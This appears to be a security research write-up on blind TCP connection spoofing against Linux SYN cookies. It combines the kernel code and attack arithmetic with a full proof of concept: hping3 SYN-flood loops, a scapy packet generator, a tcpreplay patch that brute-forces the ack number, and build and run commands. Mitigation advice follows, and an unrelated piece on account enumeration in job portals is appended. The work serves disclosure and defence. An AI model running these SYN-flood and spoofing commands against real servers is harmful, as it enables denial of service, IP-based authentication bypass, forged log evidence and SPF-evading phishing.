After this three-way handshake, the TCP connection is established and both sides can send data to each other. The initial sequence numbers make sure that the other side can actually receive the packets and thus prevent IP spoofing given that the attacker can't receive packets sent to the spoofed IP address.

Since the initial sequence numbers are only 32-bit values, it is not impossible to blindly spoof a connection by brute-forcing the ISN. Suppose we need to send 3 packets to the server: one SYN packet to initiate the connection, one ACK packet to finish the three-way handshake and one payload packet. Then we will have to send 3*2^32 packets per successfully spoofed connection on average. At a packet rate of 300,000 packets per second (which can easily be achieved with a gigabit connection), sending these packets takes some 12 hours.
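The estimate is easy to check. Each attempt hits the right ISN with probability 1/2^32, so the attacker needs 2^32 attempts on average, at three packets each. A few lines of Python with the numbers from the text:

```python
ISN_SPACE = 2 ** 32  # possible 32-bit initial sequence numbers


def brute_force_hours(packets_per_attempt: int, packets_per_second: float) -> float:
    """Expected time for a blind ISN guess, assuming independent random attempts."""
    # Each attempt succeeds with probability 1 / 2^32, so 2^32 attempts on average.
    total_packets = packets_per_attempt * ISN_SPACE
    return total_packets / packets_per_second / 3600


hours = brute_force_hours(packets_per_attempt=3, packets_per_second=300_000)
print(f"{hours:.1f} hours")
```

This prints `11.9 hours`, i.e. the "some 12 hours" from the text.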

One long-known weakness of the original TCP protocol design is that an attacker can spoof a high number of SYN packets to a server. The server then has to send (and maybe even retransmit) a SYN-ACK packet to each of the spoofed IP addresses. It also has to keep track of each half-open connection so that it can handle a later ACK packet. Remembering a high number of bogus half-open connections can lead to resource exhaustion and make the server unresponsive to legitimate clients. This attack is called SYN Flooding, and it can lead to DoS even if the attacker only uses a fraction of the network bandwidth available to the server.

II. Description of the SYN Cookie approach

To protect servers against SYN-Flooding attacks, Daniel J. Bernstein suggested the technique of TCP SYN Cookies in 1996. The main idea of the approach is not to keep track of incoming SYN packets but instead to encode the required information in the ISN generated by the server. When the server receives an ACK packet, it can check whether the Ack number from the client actually matches the server-generated ISN. The ISN can easily be recalculated at that point. This allows processing the ACK packet without remembering anything about the initial SYN request issued by the client.

Since the server doesn't keep track of half-open connections, it can't remember any detail of the SYN packet sent by the client. The initial SYN packet contains the maximum segment size (MSS) of the client, so the server encodes the MSS in the ISN using 3 bits (via a table with 8 hard-coded MSS values). To make half-open connections expire after a certain time, the server also encodes a slowly incrementing counter (typically incremented about once a minute) into the ISN. Other options of the initial SYN packet are typically ignored (although recent Linux kernels do support some options by encoding them via TCP Timestamps [1]). When receiving an ACK packet, the kernel extracts the counter value from the SYN Cookie and checks whether it is one of the last 4 valid values.

The original approach of Bernstein [2] encodes the counter and the MSS value in the first 8 bits of the ISN. This leaves only 24 bits for the cryptographically generated (non-guessable) value that must be guessed to spoof a connection. Given the speed of modern network hardware, 24 bits can easily be brute forced within a relatively short time. To mitigate this attack, Bernstein suggests [3]:

"Add another number to the cookie: a 32-bit server-selected secret function of the client address and server address (but not the current time). This forces the attacker to guess 32 bits instead of 24."

This is implemented in recent Linux kernels and it does indeed make guessing the ISN more costly than a simple implementation without this additional secret function. However, as we will see in the next section, it does not require the attacker to guess the full 32 bit ISN.

The following function shows the generation of the SYN Cookies in the Linux Kernel 3.10.1 (file net/ipv4/syncookies.c):

#define COOKIEBITS 24	/* Upper bits store count */
#define COOKIEMASK (((__u32)1 << COOKIEBITS) - 1)
 
static __u32 secure_tcp_syn_cookie(__be32 saddr, __be32 daddr, __be16 sport,
				   __be16 dport, __u32 sseq, __u32 count,
				   __u32 data)
{
	/*
	 * Compute the secure sequence number.
	 * The output should be:
	 *   HASH(sec1,saddr,sport,daddr,dport,sec1) + sseq + (count * 2^24)
	 *      + (HASH(sec2,saddr,sport,daddr,dport,count,sec2) % 2^24).
	 * Where sseq is their sequence number and count increases every
	 * minute by 1.
	 * As an extra hack, we add a small "data" value that encodes the
	 * MSS into the second hash value.
	 */
 
	return (cookie_hash(saddr, daddr, sport, dport, 0, 0) +
		sseq + (count << COOKIEBITS) +
		((cookie_hash(saddr, daddr, sport, dport, count, 1) + data)
		 & COOKIEMASK));
}

The value sseq is the sequence number generated by the client and is therefore directly known to the attacker. The data is an integer between 0 and 7, which encodes one of 8 possible MSS values. The count value is just a timestamp which is increased once a minute and it is encoded in the upper 8 bits of the generated cookie. However, since the first hash value is not known to the attacker, the timestamp value must be guessed by the attacker as well.

The following two functions show how the SYN Cookies are verified when receiving an ACK packet:

#define COUNTER_TRIES 4
 
/*
 * This retrieves the small "data" value from the syncookie.
 * If the syncookie is bad, the data returned will be out of
 * range.  This must be checked by the caller.
 *
 * The count value used to generate the cookie must be within
 * "maxdiff" if the current (passed-in) "count".  The return value
 * is (__u32)-1 if this test fails.
 */
static __u32 check_tcp_syn_cookie(__u32 cookie, __be32 saddr, __be32 daddr,
				  __be16 sport, __be16 dport, __u32 sseq,
				  __u32 count, __u32 maxdiff)
{
	__u32 diff;
 
	/* Strip away the layers from the cookie */
	cookie -= cookie_hash(saddr, daddr, sport, dport, 0, 0) + sseq;
 
	/* Cookie is now reduced to (count * 2^24) ^ (hash % 2^24) */
	diff = (count - (cookie >> COOKIEBITS)) & ((__u32) - 1 >> COOKIEBITS);
	if (diff &gt;= maxdiff)
		return (__u32)-1;
 
	return (cookie -
		cookie_hash(saddr, daddr, sport, dport, count - diff, 1))
		& COOKIEMASK;	/* Leaving the data behind */
}
 
/*
 * Check if a ack sequence number is a valid syncookie.
 * Return the decoded mss if it is, or 0 if not.
 */
static inline int cookie_check(struct sk_buff *skb, __u32 cookie)
{
	const struct iphdr *iph = ip_hdr(skb);
	const struct tcphdr *th = tcp_hdr(skb);
	__u32 seq = ntohl(th->seq) - 1;
	__u32 mssind = check_tcp_syn_cookie(cookie, iph->saddr, iph->daddr,
					    th->source, th->dest, seq,
					    jiffies / (HZ * 60),
					    COUNTER_TRIES);
 
	return mssind < ARRAY_SIZE(msstab) ? msstab[mssind] : 0;
}

First of all, the server subtracts the first hash value and the sequence number chosen by the client. This is easily possible because the first hash only depends on a server secret and the source/destination address/port and doesn't change over time. The upper 8 bits then contain the count value, and the cookie is only considered further if this counter is one of the last four valid counter values. At that point the counter used for generating the SYN Cookie is known, and the server can therefore calculate the second hash and subtract it from the cookie. The remaining value is the encoded MSS value. The cookie is only accepted if this encoded MSS value is actually a number between 0 and 7.
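To follow the arithmetic of the two functions more easily, here is a small Python model of cookie generation and verification. It is a sketch, not the kernel code: the kernel's cookie_hash() is replaced by a hypothetical keyed stand-in (HMAC-SHA256 with made-up secrets, truncated to 32 bits), addresses, ports and sequence numbers are plain integers instead of network-byte-order fields, and the names make_cookie(), check_cookie() and cookie_ok() are illustrative.

```python
import hashlib
import hmac
import struct

COOKIEBITS = 24
COOKIEMASK = (1 << COOKIEBITS) - 1
MASK32 = 0xFFFFFFFF
COUNTER_TRIES = 4

# Hypothetical server secrets; the kernel generates its own random secrets.
SECRETS = (b"hypothetical-secret-0", b"hypothetical-secret-1")


def cookie_hash(saddr, daddr, sport, dport, count, c):
    """Stand-in for the kernel's cookie_hash(): keyed 32-bit hash of 4-tuple and count."""
    msg = struct.pack("!IIHHI", saddr, daddr, sport, dport, count)
    digest = hmac.new(SECRETS[c], msg, hashlib.sha256).digest()
    return int.from_bytes(digest[:4], "big")


def make_cookie(saddr, daddr, sport, dport, sseq, count, data):
    """Model of secure_tcp_syn_cookie(); the final mask emulates __u32 wrap-around."""
    return (cookie_hash(saddr, daddr, sport, dport, 0, 0) + sseq
            + (count << COOKIEBITS)
            + ((cookie_hash(saddr, daddr, sport, dport, count, 1) + data) & COOKIEMASK)
            ) & MASK32


def check_cookie(cookie, saddr, daddr, sport, dport, sseq, count, maxdiff=COUNTER_TRIES):
    """Model of check_tcp_syn_cookie(): returns the encoded data or 0xFFFFFFFF."""
    # Strip the first hash and the client's sequence number.
    cookie = (cookie - cookie_hash(saddr, daddr, sport, dport, 0, 0) - sseq) & MASK32
    # The upper 8 bits now hold the counter that was used to build the cookie.
    diff = (count - (cookie >> COOKIEBITS)) & (MASK32 >> COOKIEBITS)
    if diff >= maxdiff:
        return MASK32
    # Remove the second hash; the low 24 bits then hold the data value.
    older = (count - diff) & MASK32
    return (cookie - cookie_hash(saddr, daddr, sport, dport, older, 1)) & COOKIEMASK


def cookie_ok(cookie, saddr, daddr, sport, dport, sseq, count):
    """Like cookie_check(): accept only if the decoded value is one of the 8 MSS indices."""
    return check_cookie(cookie, saddr, daddr, sport, dport, sseq, count) < 8
```

A cookie generated with count 1000 and data 5 decodes to 5 when checked at counts 1000 to 1003, while a check at count 1004 returns 0xFFFFFFFF, which mirrors the four-counter window of COUNTER_TRIES.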

III. Reduced cost of guessing due to multiple valid ISNs

Since the kernel encodes a counter and the MSS value in the ISN, there must be one valid ISN for every combination of a valid counter value and a valid MSS value. In current implementations there are 4 valid counter values and 8 possible MSS values. This gives a total of 32 valid combinations which will be accepted by the server at any given time. Each of these 32 combinations results in one valid ISN, and if the attacker guesses any one of them, the kernel will accept the ACK packet. This reduces the effort needed to successfully guess a valid ISN by a factor of 32.
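The factor of 32 can be checked with a short Python sketch. It treats the two hash values as unknown random 32-bit numbers (drawn with the random module purely for illustration, standing in for the server-secret hashes), builds every ISN the server would accept for one connection 4-tuple, and counts them. accepted_isns() is a hypothetical helper.

```python
import random

COOKIEBITS = 24
COOKIEMASK = (1 << COOKIEBITS) - 1
MASK32 = 0xFFFFFFFF


def accepted_isns(h1, h2_by_count, sseq, current_count, counter_tries=4, mss_values=8):
    """Return every cookie value the server accepts at current_count.

    h1 stands in for cookie_hash(..., 0, 0) and h2_by_count[c] for
    cookie_hash(..., c, 1); a blind attacker knows neither of them.
    """
    isns = set()
    for diff in range(counter_tries):
        count = current_count - diff
        for data in range(mss_values):
            isn = (h1 + sseq + (count << COOKIEBITS)
                   + ((h2_by_count[count] + data) & COOKIEMASK)) & MASK32
            isns.add(isn)
    return isns


rng = random.Random(1)
h1 = rng.getrandbits(32)
current = 1000
h2 = {c: rng.getrandbits(32) for c in range(current - 3, current + 1)}
valid = accepted_isns(h1, h2, sseq=42, current_count=current)
print(len(valid))  # 32
```

The 32 values are always distinct: within one counter the low 24 bits differ by the data value, and different counters shift the upper bits by a nonzero multiple of 2^24 that the 24-bit part cannot compensate. A single random guess therefore succeeds with probability 32 / 2^32 = 2^-27.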

Since the server doesn't remember that it has received a SYN packet when using SYN Cookies, there is no need to actually send the initial SYN packet. If we start the connection by sending an ACK packet and guess one of the 32 valid ISNs, the kernel will process the ACK packet without noticing that it has never received a SYN packet from the client nor responded with a SYN-ACK packet.

IV. Combination of ACK-Packet and Payload

Although the TCP standard assumes that the three-way handshake is completed before any data is sent, it is also possible to add data to the final ACK packet of the handshake [4]. This means that guessing an ISN and spoofing a full TCP connection with some payload data (such as an HTTP request) can be reduced to sending out one single packet. So the average number of packets required per successfully spoofed connection can be reduced to 2^32 / 32 = 2^27 (because the server accepts 32 different ISNs at a time). At a packet rate of 300,000 pps (which can easily be achieved with gigabit Ethernet), this number of packets can be sent out in less than 8 minutes on average (compared to the 12 hours calculated in section I).
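The arithmetic behind the 8-minute figure, as a short Python calculation using the 300,000 pps rate from the text. It assumes that every guess costs exactly one packet (ACK plus payload) and that on average one in 2^27 guesses hits a valid ISN.

```python
ISN_SPACE = 2**32
VALID_ISNS = 32         # 4 counter values x 8 MSS values
PACKET_RATE = 300_000   # packets per second, figure used in the text

packets_per_success = ISN_SPACE // VALID_ISNS
seconds = packets_per_success / PACKET_RATE

print(packets_per_success)      # 134217728
print(round(seconds / 60, 1))   # 7.5 (minutes on average)
```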

V. Possible real-life applications of TCP Connection spoofing

Many application developers assume that TCP makes sure that the client IP address is actually correct and can't easily be spoofed. Being able to spoof the source address obviously creates significant problems when using the IP address for authentication e.g. for legacy protocols like RSH. Even if RSH has widely been replaced by more secure alternatives like SSH by now, there are still some applications where the IP address is used for authentication. For instance it is still common to have administrative interfaces which can only be accessed from certain IP addresses. Another widespread usage of IP addresses for authentication is that many web applications bind the session ID to a specific IP address. If the session ID can be stolen by other means, an attacker can use the method described here to bypass this IP address verification.

Aside from actually using IP addresses for authenticating requests, it is also quite common to log IP addresses, which may then be used to track down initiators of objectionable requests such as exploits, abusive blog comments or illegal file sharing traffic. Using the technique described here may allow planting false evidence in the logged IP addresses.

Being able to spoof IP addresses also allows bypassing SPF e.g. when sending spear phishing mails in order to give the phishing mails the additional credibility of a valid SPF sender address, which may help to bypass email filtering software.

An obvious limitation of the technique described here is that when spoofing the IP address, you can only send a request (which may result in persistent changes on the server) but not receive any responses sent by the server. For many protocols it is however possible to guess the size of the server responses, send matching ACK packets and transmit multiple payload packets in order to spoof a more complex protocol interaction with the server.

VI. POC Exploit and real-life performance measures

This section describes the steps needed to actually carry out the attack and contains full POC code. For my experimental setup the server used the IP address 192.168.1.11 and port 1234. The attacker system was located in the same local subnet and the spoofed IP address was 192.168.1.217.

First of all, even if SYN Cookies are enabled in /proc/sys/net/ipv4/tcp_syncookies (which is the default for various Linux distributions), the system will still use a traditional backlog queue for storing half-open connections and only fall back to using SYN Cookies if the backlog queue overflows. The main reason for this is that storing information about connection requests allows full support of TCP options and arbitrary MSS values (which don't have to be reduced to one of 8 predefined values). The backlog queue size is 2048 by default and can be adjusted via /proc/sys/net/ipv4/tcp_max_syn_backlog. So in order to actually carry out the spoofing attack, we have to intentionally overflow the backlog queue with a SYN flooding attack. This can be done e.g. with the hping3 command:

hping3 -i u100 -p 1234 -S -a 192.168.1.216 -q 192.168.1.11

Experiments have shown that running hping3 in parallel to the actual ISN brute-forcing does significantly reduce the packet rate even if hping3 is configured to use only a small fraction of the packet rate of the ISN brute-forcing tool. In order to achieve the maximum packet rate possible, it is therefore more efficient to run hping3 in regular short intervals. The following command sends out 3000 SYN packets in a short burst once a second:

while true;do time hping3 -i u1 -c 3000 -S -q -p 1234 -a 192.168.1.216 192.168.1.11;sleep 1;done

The source IP address used for this SYN flooding attack should not respond with a RST packet or return an ICMP Destination Host Unreachable message, so that the queue entries aren't freed before they time out. On Linux you can easily add another IP address to a network interface and block all traffic coming to this IP address in order to prevent it from responding with RST packets:

ifconfig eth0:1 inet 192.168.1.216 netmask 255.255.255.0 up
iptables -I INPUT --dst 192.168.1.216 -j DROP

I've used the same commands to set up the IP address 192.168.1.217, which is the IP address I wanted to spoof. This makes sure that sending responses to the spoofed address won't lead to a RST packet or an ICMP Destination Host Unreachable packet, which may lead to a premature termination of the connection and the processing of the spoofed request in the server software.

ifconfig eth0:2 inet 192.168.1.217 netmask 255.255.255.0 up
iptables -I INPUT --dst 192.168.1.217 -j DROP

In a real-world attack, the same goal can also be achieved by launching a (D)DoS attack against the spoofed IP address.

Once the system is in SYN Cookie mode, it is necessary to spoof a high number of ACK packets with a payload in order to guess one of the 32 valid ISNs. I initially wanted to do this with scapy, but this failed due to the very low performance of scapy (less than 10k packets per second). So I went on to create a pcap file in scapy, which can then be sent out in a loop with a patched version of tcpreplay. The patched tcpreplay just increases the ack field of the TCP header by 31337 for each repetition of the loop. Using an odd number makes sure that the ack field reaches all 2^32 possible values without repetitions. In theory you could just try all possible ISNs linearly. However, the counter value in the upper 8 bits of the ISN only changes once a minute and is incremented linearly for a given combination of source and destination address/port. A linear search will therefore likely spend a long time in a range which contains no valid ISN at all. So it is advisable to increment the guessed ISN by a larger number, so that it traverses the full ISN space relatively quickly.
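Why an odd step size covers the whole ISN space can be checked in Python on a smaller 16-bit space (the full 2^32 space is too large to walk in a quick test). An odd stride is coprime to every power of two, so repeatedly adding it visits every value once before repeating; an even stride gets stuck in a subset. distinct_values_visited() is a hypothetical helper written for this illustration.

```python
import math


def distinct_values_visited(stride, bits):
    """Count distinct values reached by k * stride (mod 2^bits) for k in 0 .. 2^bits - 1."""
    modulus = 1 << bits
    value, seen = 0, set()
    for _ in range(modulus):
        seen.add(value)
        value = (value + stride) % modulus
    return len(seen)


print(math.gcd(31337, 2**32))               # 1: 31337 is coprime to 2^32
print(distinct_values_visited(31337, 16))   # 65536: every 16-bit value is reached
print(distinct_values_visited(31338, 16))   # 32768: an even stride misses half of them
```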

The following Python script (saved as create_packet.py for the commands further below) creates a single ACK packet with some payload data and writes the packet to a pcap file:

#!/usr/bin/python
 
# Change log level to suppress annoying IPv6 error
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
 
from scapy.all import *
import time
 
# Adjust MAC addresses of sender and recipient of this packet accordingly, the dst MAC 
# should be the MAC of the gateway to use when the target is not on your local subnet
ether=Ether(src="40:eb:60:9f:42:a0",dst="e8:40:f2:d1:b3:a2")
# Set up source and destination IP addresses
ip=IP(src="192.168.1.217", dst="192.168.1.11")
 
# Assemble an ACK packet with "Hello World\n" as a payload
pkt = ether/ip/TCP(sport=31337, dport=1234, flags="A", seq=43, ack=1337) / ("Hello World\n")
# Write the packet to a pcap file, which can then be sent using a patched version of tcpreplay
wrpcap("ack_with_payload.pcap",pkt)

The next step is to patch and compile tcpreplay with the following patch:

diff -u -r tcpreplay-3.4.4/src/send_packets.c tcpreplay-3.4.4.patched/src/send_packets.c
--- tcpreplay-3.4.4/src/send_packets.c	2010-04-05 02:58:02.000000000 +0200
+++ tcpreplay-3.4.4.patched/src/send_packets.c	2013-08-06 10:56:51.757048452 +0200
@@ -81,6 +81,9 @@
 void
 send_packets(pcap_t *pcap, int cache_file_idx)
 {
+    static u_int32_t ack_bruteforce_offset = 1;
+    uint32_t* ack;
+    uint32_t orig_ack;
     struct timeval last = { 0, 0 }, last_print_time = { 0, 0 }, print_delta, now;
     COUNTER packetnum = 0;
     struct pcap_pkthdr pkthdr;
@@ -154,6 +157,9 @@
 #endif
 
 #if defined TCPREPLAY && defined TCPREPLAY_EDIT
+        ack = (uint32_t*)(pktdata + 14 + 20 + 8);
+        orig_ack = *ack;
+        *ack = htonl(ntohl(*ack) + ack_bruteforce_offset);
         pkthdr_ptr = &pkthdr;
         if (tcpedit_packet(tcpedit, &pkthdr_ptr, &pktdata, sp->cache_dir) == -1) {
             errx(-1, "Error editing packet #" COUNTER_SPEC ": %s", packetnum, tcpedit_geterr(tcpedit));
@@ -176,7 +182,7 @@
         /* write packet out on network */
         if (sendpacket(sp, pktdata, pktlen) < (int)pktlen)
             warnx("Unable to send packet: %s", sendpacket_geterr(sp));
-
+        *ack = orig_ack;
         /*
          * track the time of the "last packet sent".  Again, because of OpenBSD
          * we have to do a mempcy rather then assignment.
@@ -205,7 +211,7 @@
             }
         }
     } /* while */
-
+    ack_bruteforce_offset += 31337;
     if (options.enable_file_cache) {
         options.file_cache[cache_file_idx].cached = TRUE;
     }
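The patch hard-codes the position of the acknowledgement number as 14 + 20 + 8 = 42 bytes into the frame. The Python sketch below illustrates that offset and the in-place increment: it builds a minimal Ethernet/IPv4/TCP frame with struct, assuming (like the patch) no 802.1Q VLAN tag and no IP options, and adds an offset to the big-endian ack field. build_frame() and bump_ack() are hypothetical helpers, and the sketch does not touch the TCP checksum.

```python
import struct

ETH_HLEN = 14     # Ethernet header without an 802.1Q VLAN tag
IP_HLEN = 20      # IPv4 header without options
TCP_ACK_OFF = 8   # ack number follows the two 2-byte ports and the 4-byte seq
ACK_POS = ETH_HLEN + IP_HLEN + TCP_ACK_OFF   # 42


def build_frame(seq, ack):
    """Assemble a minimal Ethernet/IPv4/TCP ACK frame (MACs and checksums zeroed)."""
    eth = bytes(12) + struct.pack("!H", 0x0800)             # dst/src MAC + EtherType IPv4
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, 64, 6, 0,
                     bytes([192, 168, 1, 217]), bytes([192, 168, 1, 11]))
    tcp = struct.pack("!HHIIBBHHH", 31337, 1234, seq, ack,
                      5 << 4, 0x10, 8192, 0, 0)             # data offset 5, ACK flag
    return bytearray(eth + ip + tcp)


def bump_ack(frame, offset):
    """Same idea as the patch: add offset to the 32-bit ack field, wrapping at 2^32."""
    (ack,) = struct.unpack_from("!I", frame, ACK_POS)
    struct.pack_into("!I", frame, ACK_POS, (ack + offset) & 0xFFFFFFFF)


frame = build_frame(seq=43, ack=1337)
bump_ack(frame, 31337)
```

The seq=43 and ack=1337 values match the ones used in the scapy script; after bump_ack() the ack field holds 1337 + 31337 while the sequence number at offset 38 is unchanged.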

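Here are the commands needed to patch and compile it on an Ubuntu 12.04 amd64 system, assuming the patch above has been saved as tcpreplay_patch.txt in the directory where the tcpreplay source is downloaded: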

apt-get install build-essential libpcap-dev
ln -s lib/x86_64-linux-gnu /usr/lib64 # Quick workaround for a bug in the build system of tcpreplay
wget -O tcpreplay-3.4.4.tar.gz http://prdownloads.sourceforge.net/tcpreplay/tcpreplay-3.4.4.tar.gz?download
tar xzvf tcpreplay-3.4.4.tar.gz
cd tcpreplay-3.4.4
cat ../tcpreplay_patch.txt | patch -p1
./configure
make
cp src/tcpreplay-edit ../

After compiling a patched version of tcpreplay, you can use the following commands to actually send out packets in an infinite loop:

python create_packet.py
while true;do time ./tcpreplay-edit -i eth0 -t -C -K -l 500000000 -q ack_with_payload.pcap;done

VII. Experimental results

I've tested this setup in a local network between a 3-year-old notebook (HP 6440b, i5-430M CPU and Marvell 88E8072 gigabit NIC) as the client and a desktop computer as the server. With a small test payload, the achievable packet rate is some 280,000 packets per second, at about 73% CPU usage of the tcpreplay process (18% user and 55% sys in the output of time). According to [5], it may be expected that the packet rate can at least be doubled on a fast system with a decent Intel gigabit network card. Obviously the actual packet rate also depends on the size of the payload data. During a 10.5 hour overnight run I successfully spoofed 64 connections, which is about one successful spoof every 10 minutes. This is a little bit less than the expected value of 79 spoofed connections (once every 8 minutes). There are several possible explanations for this deviation:

  • The tcpreplay process takes some time to print the statistics in the end. During that time no packets are sent. I've only used the statistics output of tcpreplay for measuring the packet rate and so the measured packet rate may be a little bit off.
  • When going to the maximum packet rate achievable with your hardware, there may be packet loss (especially if you don't use any kind of congestion control).
  • Last but not least the spoofing is a statistical process. The standard deviation is approximately the square root of the expected number of spoofed connections and it is not particularly unlikely to be off by one or two standard deviations from the expected value. For this experiment the standard deviation is sqrt(79) = 8.89 and the measured number of spoofed connections was off by 1.68 standard deviations, which is well within the expected statistical variation.
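The expected value and standard deviation from the list above can be reproduced with a few lines of Python. The sketch models the number of successful spoofs as a Poisson variable (variance equal to the mean), an assumption consistent with the square-root rule used above, and it uses the unrounded expectation instead of 79.

```python
import math

PACKETS_PER_HIT = 2**32 // 32   # 32 valid ISNs out of 2^32
rate_pps = 280_000              # measured packet rate from the text
duration_s = 10.5 * 3600        # length of the overnight run in seconds
observed = 64                   # spoofed connections actually seen

expected = rate_pps * duration_s / PACKETS_PER_HIT
sigma = math.sqrt(expected)     # Poisson approximation
z = (expected - observed) / sigma

print(round(expected, 1), round(sigma, 2), round(z, 2))
```

This prints 78.9, 8.88 and 1.67; the slightly smaller deviation compared to the rounded figures above doesn't change the conclusion that the result is within normal statistical variation.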

VIII. Possible mitigation options

The simplification of TCP connection spoofing described here is an inherent problem of TCP SYN Cookies, so there won't be a simple patch which just solves the issue and makes the spoofing attack as hard as it is without SYN Cookies. It is only possible to gradually increase the required effort for successfully spoofing a connection, e.g. by only accepting the last two instead of four counter values (which will lead to a 60-120s timeout between the initial SYN and the final ACK packet of the three-way handshake during a SYN flooding attack) or by disallowing the combination of the final ACK packet with payload data (which will double the number of packets the attacker has to send). However, even with these two mitigation options in place, the spoofing attack is still about an order of magnitude easier with SYN Cookies than without them, and it would still be very inadvisable to assume that the source IP address of TCP connections can't be spoofed. It may also be possible to use the lower bits of the TCP timestamp option (which is currently used in order to support TCP options with SYN Cookies) for encoding the MSS and counter values. However, this can only provide effective protection against a spoofing attack if the server refuses clients which don't support TCP timestamps during a SYN flooding attack, which will break compatibility with some standards-compliant TCP implementations.
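A rough Python calculation of how far the two mitigations move the attacker's cost. It is a simplification: it assumes that without SYN cookies the attacker faces exactly one valid ISN and pays one packet per guess, and it ignores the initial SYN packets and packet loss. packets_per_spoof() is an illustrative helper.

```python
ISN_SPACE = 2**32


def packets_per_spoof(valid_isns, packets_per_guess):
    """Average number of packets sent per successfully spoofed connection."""
    return ISN_SPACE // valid_isns * packets_per_guess


current = packets_per_spoof(valid_isns=4 * 8, packets_per_guess=1)    # 4 counters, payload in ACK
mitigated = packets_per_spoof(valid_isns=2 * 8, packets_per_guess=2)  # 2 counters, separate data packet
no_cookies = packets_per_spoof(valid_isns=1, packets_per_guess=1)     # simplifying assumption

print(mitigated // current)     # 4: both mitigations make the attack 4 times harder
print(no_cookies // mitigated)  # 8: still close to an order of magnitude easier than without cookies
```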

It is obviously possible to disable SYN Cookies (and increase the backlog queue size in /proc/sys/net/ipv4/tcp_max_syn_backlog) in order to make the spoofing attack as hard as possible and force an attacker to brute-force the full 32-bit ISN space. However, disabling SYN Cookies may require a significant amount of CPU time and memory during a SYN flooding attack. Moreover, spoofing is still not impossible even without SYN Cookies and will likely succeed within a couple of hours over a gigabit Ethernet connection.

Given the limitations of the other mitigation options, my suggestion is to solve the problem on a higher level and make sure that the security of applications doesn't rely on the impossibility of spoofing the source address of TCP connections. This obviously means that you should never rely on source IP addresses for authentication. For web applications it is also possible to mitigate the issue by using secure CSRF tokens for all actions which cause persistent changes on the server and refusing to process such a request unless it carries a valid CSRF token. In that case the IP address of the request using the CSRF token may be spoofed, but the IP address to which the token has been sent can't be spoofed, since the attacker needs to receive the CSRF token in order to use it. When logging IP addresses used for certain actions such as blog comments or account registrations, the IP address to which the CSRF token has been sent should be logged in addition to (or instead of) the IP address using the token.
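A minimal Python sketch of the CSRF approach, under stated assumptions: tokens are random one-time values kept in an in-memory dictionary (standing in for a real session store), and issue_token() and handle_post() are hypothetical handler names, not part of any framework. The log entry records the IP address the token was sent to alongside the (possibly spoofed) address that used it.

```python
import secrets
import time

issued = {}  # token -> (IP address the token was sent to, issue time); hypothetical store


def issue_token(client_ip):
    """Create a random CSRF token for a form and remember where it was sent."""
    token = secrets.token_urlsafe(32)
    issued[token] = (client_ip, time.time())
    return token


def handle_post(token, request_ip, max_age=3600):
    """Process a state-changing request only with a valid, unused, fresh token.

    Returns a log entry with both addresses, or None if the request is rejected.
    """
    entry = issued.pop(token, None)   # pop makes every token single-use
    if entry is None:
        return None
    issued_ip, issued_at = entry
    if time.time() - issued_at > max_age:
        return None
    return {"token_sent_to": issued_ip, "request_from": request_ip}
```

A blind attacker who spoofs request_from never sees the token, so a forged request without a previously received token is rejected, and accepted requests are logged with an address the attacker actually had to receive traffic on.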

References:
[1]: http://lwn.net/Articles/277146/
[2]: http://cr.yp.to/syncookies.html Section "What are SYN cookies?"
[3]: http://cr.yp.to/syncookies.html Section "Blind connection forgery"
[4]: http://www.thice.nl/creating-ack-get-packets-with-scapy/
[5]: http://wiki.networksecuritytoolkit.org/nstwiki/index.php/LAN_Ethernet_Maximum_Rates,_Generation,_Capturing_%26_Monitoring#pktgen:_UDP_60_Byte_Packets

Information leakage in many websites and job application portals


1. Summary

Many websites such as forums, dating sites, job application portals, newsletters or social networks require a user registration. This registration generally requires an email address and a freely choosable pseudonym as username. Most Internet users assume that only the chosen pseudonym is publicly visible while the email address is treated confidentially by the site operator. Depending on the type of website, it is important that the existence of an account is kept confidential, since knowing that an account exists may allow certain conclusions about the account owner. As an example, if a person has registered in a forum about a specific disease, it is likely that this person is affected by this disease. The problem presented here allows unauthorized third parties to find out whether there is an account for a specific email address. In the case of online job application portals, the existence of an account typically means that the account owner has applied for a job. This may allow an employer to find out that one of his employees has confidentially applied for a job at another company.

2. Description of the problem

The main problem is that if a user tries to register with an email address or a username, which is already registered at the site, the user gets a corresponding error message in the browser. An unauthorized third party may try to register with the email address or username of the potential account owner. If this results in an error message, the attacker may conclude that the email address or username is already registered.

The email address is linked to a specific person, and most employers know at least one private email address of their employees. The problem can obviously only reveal the existence of an account on a site such as a job application portal and no more detailed information about the account (such as the pseudonym corresponding to a given email address or the application submitted). However, the bare fact that an employee has applied for another job may already have negative consequences for the existing employment.

For some sites such as job application portals, the username can also be linked to a specific person (especially for rare names and/or small industries), since many applicants choose an easily predictable username such as "First Name.Last Name" or a pseudonym which is also known to their current employer, and expect their data to be treated confidentially by the company they apply to. If this predictable username is registered in the job application portal of another company, an employer may conclude that his employee is applying for a job there.

Some websites don't require a username and use the email address and password for logging in. Some other sites assign a randomly chosen username for every registered user. Most of these sites reveal the existence of an account for an email address as well when trying to register again with the email address.

3. Prevalence of the problem among job application portals

I have checked the job application portals of some big companies by trying to register with the same username or email address twice. 27 of the 30 companies in the DAX index (which contains the largest listed companies in Germany) are affected by the problem. The remaining 3 companies either don't provide an online job application portal or only allow direct applications without an account registration. This leads to the conclusion that the vast majority of companies running an online job application portal are affected by the problem. Some international companies such as IBM or Intel are affected as well.

4. Other problematic online accounts

The problem not only affects job application portals but also many other websites such as online shops, forums, newsletters, social networks or dating sites. The mere existence of an account in a forum may lead to problematic conclusions about the owner of the account. An employer may for instance check whether a female applicant is registered in a forum about pregnancy with the email address used for the application, instead of asking whether she is pregnant (which is illegal to ask in some countries), and not employ her if there is an account. The registration in a forum or a newsletter about a sensitive topic such as employment rights, homosexuality, certain political opinions/activities, diseases (e.g. HIV) or mental health problems should also not be revealed to everyone who knows the user's email address. Most users expect that a forum only reveals the chosen pseudonym to the public and that the email address is treated confidentially. So it may be problematic if everyone who knows the email address can figure out that someone has an account in a forum.

5. Possible use of vulnerability by cyber criminals

The existence of an account in a forum or vendor support site about specific hardware or software components can reveal some information about the hardware/software used by the account owner. This may allow an attacker to specifically exploit vulnerabilities in those components in a targeted attack.

Cyber criminals could also exploit this problem to increase the effectiveness of their attacks. For instance, a phisher may choose to only send his phishing mails to email addresses which are actually registered at a site. An attacker may also verify that an account exists before trying to break into the account by brute-forcing the password (or the security question for resetting the password).

6. Confirmation emails

Some sites send a confirmation email when someone tries to register with a given email address. These confirmation emails allow users to find out that someone has tried to register with their email address on a site.

